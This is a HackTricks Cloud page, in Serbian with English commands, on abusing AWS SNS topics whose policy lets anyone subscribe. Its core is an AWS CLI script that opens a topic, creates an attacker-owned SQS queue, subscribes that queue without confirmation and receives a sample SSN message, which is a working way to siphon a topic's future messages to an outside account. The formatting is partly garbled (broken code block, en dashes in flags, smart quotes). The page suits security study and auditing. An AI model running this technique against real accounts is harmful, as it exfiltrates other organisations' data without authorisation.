HackTricks CloudAWS - SNS Unauthenticated Enum
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
SNS
Za više informacija o SNS pogledajte:
Otvoreno za sve
Kada konfigurišete SNS topic iz web konzole moguće je označiti da Everyone can publish and subscribe na topic:
.png)
Dakle, ako pronađete ARN of topics unutar naloga (ili brute forcing potencijalnih imena for topics) možete proveriti da li možete publish ili subscribe na njih.
To bi bilo ekvivalentno SNS topic resource policy koja dozvoljava sns:Subscribe za * (ili za external accounts), bilo koji principal može kreirati subscription koji isporučuje sve buduće poruke topic-a u SQS queue koji poseduje. Kada vlasnik queue-a inicira subscription, nije potrebna ljudska potvrda za SQS endpoints.
Repro (us-east-1)
```bash REGION=us-east-1 # Victim account (topic owner) VICTIM_TOPIC_ARN=$(aws sns create-topic --name exfil-victim-topic-$(date +%s) --region $REGION --query TopicArn --output text)Open the topic to anyone subscribing
cat > /tmp/topic-policy.json <<JSON {“Version”:“2012-10-17”,“Statement”:[{“Sid”:“OpenSubscribe”,“Effect”:“Allow”,“Principal”:“*”,“Action”:“sns:Subscribe”,“Resource”:“$VICTIM_TOPIC_ARN”}]} JSON aws sns set-topic-attributes –region $REGION –topic-arn “$VICTIM_TOPIC_ARN” –attribute-name Policy –attribute-value file:///tmp/topic-policy.json
Attacker account (queue owner)
ATTACKER_Q_URL=$(aws sqs create-queue –queue-name attacker-exfil-queue-$(date +%s) –region $REGION –query QueueUrl –output text) ATTACKER_Q_ARN=$(aws sqs get-queue-attributes –queue-url “$ATTACKER_Q_URL” –region $REGION –attribute-names QueueArn –query Attributes.QueueArn –output text)
Allow the victim topic to send to the attacker queue
cat > /tmp/sqs-policy.json <<JSON {“Version”:“2012-10-17”,“Statement”:[{“Sid”:“AllowVictimTopicSend”,“Effect”:“Allow”,“Principal”:{“Service”:“sns.amazonaws.com”},“Action”:“sqs:SendMessage”,“Resource”:“$ATTACKER_Q_ARN”,“Condition”:{“ArnEquals”:{“aws:SourceArn”:“$VICTIM_TOPIC_ARN”}}}]} JSON aws sqs set-queue-attributes –queue-url “$ATTACKER_Q_URL” –region $REGION –attributes Policy=“$(cat /tmp/sqs-policy.json)”
Subscribe the attacker queue to the victim topic (auto-confirmed for SQS)
SUB_ARN=$(aws sns subscribe –region $REGION –topic-arn “$VICTIM_TOPIC_ARN” –protocol sqs –notification-endpoint “$ATTACKER_Q_ARN” –query SubscriptionArn –output text)
Validation: publish and receive
aws sns publish –region $REGION –topic-arn “$VICTIM_TOPIC_ARN” –message {pii:ssn:123-45-6789} aws sqs receive-message –queue-url “$ATTACKER_Q_URL” –region $REGION –max-number-of-messages 1 –wait-time-seconds 10 –query Messages[0].Body –output text
</details>
> [!TIP]
> Učite i vežbajte AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Učite i vežbajte GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Učite i vežbajte Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Podržite HackTricks</summary>
>
> - Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
> - **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
>
> </details>